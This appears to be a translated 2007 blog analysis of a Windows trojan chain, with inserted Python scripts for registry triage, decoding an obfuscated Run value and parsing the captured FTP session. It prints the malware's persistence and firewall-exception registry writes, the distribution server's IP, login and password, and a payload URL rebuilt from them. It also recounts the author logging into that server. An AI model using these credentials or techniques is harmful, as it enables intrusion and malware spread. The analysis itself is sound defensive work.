Analysis and handling of the cdnprh.dll, nlfdxfirc.exe, kuyths00.sys and kuyths00.dll viruses
2007-6-14 9:23:13  By dikex(六…   Source: user blog

After the virus is activated by running "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:

Registry changes:

Added:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay         Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile         Type: REG_DWORD, Length: 4, Data: 0

-----------------------------------------------

Network activity:

Downloads an exe file from the Internet to C:\windows\temp\nlfdxfirc.exe and runs it;

===============================================

After nlfdxfirc.exe is activated:

File changes:

Created:

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
C:\WINDOWS\system32\kuyths00.dll
C:\WINDOWS\system32\drivers\kuyths00.sys

Deleted:

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB

-----------------------------------------------

Registry changes:

Added:

HKLM\SYSTEM\ControlSet001\Services\kuyths00         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start         Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath         Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security\Security         Type: REG_BINARY, Length: 168, Data: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\NextInstance         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control\*NewlyCreated*         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Service         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Legacy         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ConfigFlags         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class         Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ClassGUID         Type: REG_SZ, Length: 78, Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\DeviceDesc         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0         Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\Count         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\NextInstance         Type: REG_DWORD, Length: 4, Data: 1
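Added example, not part of the original analysis: a small Python triage script for registry-monitor output in the shape used in both registry sections above. It flags the three things the logs show: the Run-key persistence entry and the Windows Firewall authorized-application exception written by cdnprh.dll, and the kuyths00 service registered by nlfdxfirc.exe, whose Type 1 (SERVICE_KERNEL_DRIVER), Start 3 (SERVICE_DEMAND_START) and ImagePath with the NT object-manager prefix \??\ mark it as a kernel driver loaded on demand (the Enum\Root\LEGACY_KUYTHS00 keys are what the PnP manager creates when such a legacy driver is started). The sample lines are copied from the logs above; the category names are my own.

```python
"""Triage registry writes recorded during the sample's execution.

Added example; not part of the original analysis. Parses monitor lines of the
form "<key>   Type: <REG_type>, Length: <n>, Data: <value>" and flags the three
techniques the logs above show: Run-key persistence, a Windows Firewall
authorized-application exception, and registration of a kernel-driver service.
"""
import re
from collections import defaultdict

VALUE_RE = re.compile(
    r"^(?P<key>.+?)\s{2,}Type:\s*(?P<type>REG_\w+),\s*Length:\s*\d+,\s*Data:\s*(?P<data>.*)$"
)

# SERVICE_* constants from winnt.h (service Type and Start values).
SERVICE_TYPES = {1: "SERVICE_KERNEL_DRIVER", 2: "SERVICE_FILE_SYSTEM_DRIVER",
                 16: "SERVICE_WIN32_OWN_PROCESS", 32: "SERVICE_WIN32_SHARE_PROCESS"}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
               3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}

# Lines copied from the registry logs above; key opens ("Desired Access: ...") are ignored.
SAMPLE_LOG = r"""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay         Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\kuyths00         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start         Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath         Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class         Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0         Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
"""


def parse_line(line):
    """Return (key, reg_type, data) for a value write; None for key opens and noise."""
    m = VALUE_RE.match(line.strip())
    if not m:
        return None
    return m["key"], m["type"], m["data"].strip()


def classify(lines):
    """Return a list of (category, name, detail) findings for the monitor lines."""
    findings = []
    services = defaultdict(dict)  # service name -> {value name: data}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        key, _reg_type, data = parsed
        low = key.lower()
        if "\\currentversion\\run\\" in low:
            findings.append(("run_persistence", key.rsplit("\\", 1)[1], data))
        elif "\\firewallpolicy\\" in low and "\\authorizedapplications\\list\\" in low:
            # Value format: <program>:<scope>:Enabled|Disabled:<display name>
            state = "Enabled" if ":Enabled:" in data else "Disabled"
            findings.append(("firewall_exception", state, data.split(":*:")[0]))
        elif "\\firewallpolicy\\" in low and low.endswith("\\donotallowexceptions"):
            category = "firewall_exceptions_allowed" if data == "0" else "firewall_exceptions_blocked"
            findings.append((category, "DoNotAllowExceptions", data))
        elif "\\services\\" in low:
            # Only Services\<name>\<value> (depth 2) describes the service itself.
            tail = key[low.index("\\services\\") + len("\\services\\"):]
            parts = tail.split("\\")
            if len(parts) == 2:
                services[parts[0]][parts[1]] = data
    for name, vals in services.items():
        try:
            stype, start = int(vals.get("Type", -1)), int(vals.get("Start", -1))
        except ValueError:
            continue
        image = vals.get("ImagePath", "")
        if image.startswith("\\??\\"):  # NT object-manager path prefix
            image = image[4:]
        if stype in (1, 2) or image.lower().endswith(".sys"):
            detail = f"{SERVICE_TYPES.get(stype, stype)} {START_TYPES.get(start, start)} {image}"
            findings.append(("kernel_driver_service", name, detail))
    return findings


if __name__ == "__main__":
    for category, name, detail in classify(SAMPLE_LOG.splitlines()):
        print(f"{category:28} {name:22} {detail}")
```

The same script works on the second log above unchanged: the Security and Enum subkeys of kuyths00 are deeper than Services\<name>\<value> and are skipped, so only the service definition itself is reported.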


-----------------------------------------------

Other:

At this point the rundll32.exe instance that loaded cdnprh.dll wrote a registry entry, which is the garbled value from yesterday:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neojdsacml         Type: REG_SZ, Length: 148, Data: #D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu

Even when viewed with IceSword this thing is garbled; I suspect the driver translates it back into normal data at load time;
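Added example, not part of the original post: the garbled Run value is not random. Each of its bytes is the corresponding byte of the first Run command (hqghumeay) plus one ('"' becomes '#', 'C' becomes 'D', ':' becomes ';', '\' becomes ']', 'R' becomes 'S', and so on), and the monitor reports Length 148 for both values, which is the same 73 UTF-16 characters plus a terminator. The script below shifts the bytes back, and recover() also finds the shift without being told it, which is a quick check to run on any similar-looking value.

```python
"""Decode the "garbled" Run value written by cdnprh.dll.

Added example; not part of the original analysis. Every byte of the second Run
value is the corresponding byte of the first Run command plus one, so shifting
each byte back by one recovers the command line. recover() does not assume the
offset: it tries small shifts and keeps the one that looks most like a Windows
command line.
"""

GARBLED = "#D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu"
# The first Run value from the log above, for comparison.
EXPECTED = '"C:\\WINDOWS\\system32\\Rundll32.exe" "C:\\WINDOWS\\system32\\cdnprh.dll",Start'


def shift_bytes(text, delta):
    """Add delta to every character code, wrapping within one byte."""
    return "".join(chr((ord(c) + delta) % 256) for c in text)


def command_line_score(candidate):
    """Count tokens a Run command line would contain; -1 if not all printable ASCII."""
    if not all(0x20 <= ord(c) < 0x7F for c in candidate):
        return -1
    low = candidate.lower()
    tokens = ("c:\\", "\\windows\\", "system32", "rundll32", ".exe", ".dll")
    return sum(tok in low for tok in tokens)


def recover(garbled, max_shift=32):
    """Return (shift, plaintext): the encoding shift whose undoing scores best."""
    best_shift, best_text, best_score = 0, garbled, -2
    for shift in range(-max_shift, max_shift + 1):
        text = shift_bytes(garbled, -shift)
        score = command_line_score(text)
        if score > best_score:
            best_shift, best_text, best_score = shift, text, score
    return best_shift, best_text


def reg_sz_length(text):
    """Bytes a REG_SZ of this text occupies: UTF-16 code units plus a NUL terminator."""
    return (len(text) + 1) * 2


if __name__ == "__main__":
    shift, plaintext = recover(GARBLED)
    print(f"shift={shift:+d} -> {plaintext}")
    print(f"REG_SZ length of decoded value: {reg_sz_length(plaintext)} bytes")
```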

===============================================

Tracking down the address of the exe file it downloads:

Looking through the captured packets, I did not see the exe file's address directly, but I did find the following packets:


220 Welcome to blah FTP service.
USER netserv3
331 Please specify the password.
PASS 43243wen9874
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
200 Switching to Binary mode.
PASV
PASV
227 Entering Passive Mode (60,18,146,34,150,163)
SIZE /plug/179.exe
SIZE /plug/179.exe
213 19776
RETR /plug/179.exe
150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).

Damn, it's an FTP site, and one that needs an account and password. Based on the packet data I opened the Xiaoche (小车) Site Resource Explorer with the address ftp://60.18.146.34/, login user netserv3, password 43243wen9874;
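Added example, not part of the original post: a Python parser for the FTP control-channel lines captured above. It pulls out the credentials, resolves the 227 reply to the data-connection endpoint (h1,h2,h3,h4,p1,p2 means host h1.h2.h3.h4, port p1*256+p2, here 60.18.146.34:38563), records the file the client retrieved together with the size the server reported in the 213 and 150 replies, and rebuilds the download URL from those pieces rather than by guessing. The transcript is copied from the capture above; only the unreadable bytes have been dropped.

```python
"""Extract download indicators from a captured FTP control channel.

Added example; not part of the original analysis. Walks the control-channel
lines above (client commands interleaved with three-digit server replies) and
pulls out the credentials, the data-connection endpoint announced in the 227
reply, and the file(s) retrieved with the size the server reported.
"""
import re

PASV_RE = re.compile(r"^227\b.*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
OPEN_RE = re.compile(r"^150\b.*?\bfor (\S+) \((\d+) bytes\)")

# Control-channel lines copied from the capture above (garbled bytes dropped).
CAPTURE = """\
220 Welcome to blah FTP service.
USER netserv3
331 Please specify the password.
PASS 43243wen9874
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
200 Switching to Binary mode.
PASV
PASV
227 Entering Passive Mode (60,18,146,34,150,163)
SIZE /plug/179.exe
SIZE /plug/179.exe
213 19776
RETR /plug/179.exe
150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).
"""


def parse_ftp_control(lines):
    """Summarise an FTP control-channel transcript as a dict of indicators."""
    session = {"user": None, "password": None, "binary": False,
               "data_endpoints": [], "sizes": {}, "retrieved": []}
    pending_size = None  # path of the last SIZE command, answered by the next 213 reply
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            session["user"] = arg
        elif verb == "PASS":
            session["password"] = arg
        elif verb == "TYPE" and arg.upper() == "I":
            session["binary"] = True
        elif verb == "SIZE":
            pending_size = arg
        elif verb == "213" and pending_size:
            session["sizes"][pending_size] = int(arg)
            pending_size = None
        elif verb == "RETR":
            session["retrieved"].append(arg)
        elif verb == "227":
            m = PASV_RE.match(line)
            if m:
                h1, h2, h3, h4, p1, p2 = m.groups()
                host, port = ".".join((h1, h2, h3, h4)), int(p1) * 256 + int(p2)
                session["data_endpoints"].append((host, port))
        elif verb == "150":
            m = OPEN_RE.match(line)
            if m:  # the transfer announcement repeats path and size; keep it if SIZE was missing
                session["sizes"].setdefault(m.group(1), int(m.group(2)))
    return session


def payload_urls(session):
    """Rebuild ftp:// URLs for the retrieved files, using the PASV host as the server."""
    if not session["data_endpoints"] or not session["retrieved"]:
        return []
    host = session["data_endpoints"][-1][0]
    return [f"ftp://{session['user']}:{session['password']}@{host}{path}"
            for path in session["retrieved"]]


if __name__ == "__main__":
    s = parse_ftp_control(CAPTURE.splitlines())
    print("credentials:", s["user"], s["password"])
    print("data endpoints:", s["data_endpoints"])
    print("files:", s["sizes"])
    print("urls:", payload_urls(s))
```

The PASV host is usually the same address as the control connection, as it is here, which is why the URL can be rebuilt from the capture alone; on a server behind NAT the 227 reply may carry an internal address, and the control-connection destination should be used instead.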

Hit Enter, and it logged in successfully! There are quite a few files in there. I opened the plug directory and found 20 exe files of similar size; I downloaded all of them and found that every one has a different CRC32 checksum! Then I opened the plugback directory and again found 20 exe files of almost identical size; testing showed they are the same as the ones in the plug directory;

There are some other files too; I will study them later;

===============================================

I tested a few at random, and their behaviour is exactly the same as nlfdxfirc.exe! Scanned them with Kaspersky, and not one is detected! Looks like the work of an expert! I think this thing may spread widely in the next few days! Everyone, be on guard!
